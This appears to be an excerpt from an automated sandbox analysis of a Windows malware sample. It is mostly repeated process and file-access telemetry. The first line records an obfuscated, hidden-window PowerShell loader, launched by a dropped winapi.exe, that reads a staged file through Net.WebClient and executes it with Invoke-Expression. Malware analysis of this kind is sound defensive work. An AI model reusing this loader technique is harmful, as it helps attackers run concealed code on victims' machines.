Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:zx 'net.webclient';set-variable g8e $('c:\pro'+'gramdat'+'a\micro'+'soft\update'+'desktop\eep6d'+'i0ugu.t');dir rid*;set-variable kal (.$executioncontext.invokecommand.(($executioncontext.invokecommand.psobject.methods|where-object{(get-item variable:/_).value.name-ilike'g*d'}).name).invoke($executioncontext.invokecommand.getcommandname('n*-o*',1,1),[system.management.automation.commandtypes]::cmdlet)(gi variable:\zx).value);set-item variable:/75 ((((dir variable:\kal).value|member)|where-object{(get-item variable:/_).value.name-ilike'd*g'}).name);$executioncontext|foreach{(get-item variable:/_).value.invokecommand.(($executioncontext.invokecommand|member|where-object{(get-item variable:/_).value.name-ilike'*ke*pt'}).name).invoke((dir variable:\kal).value.((gv 75 -va)).invoke((childitem variable:/g8e).value))}"
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_6C201096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6C201096
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
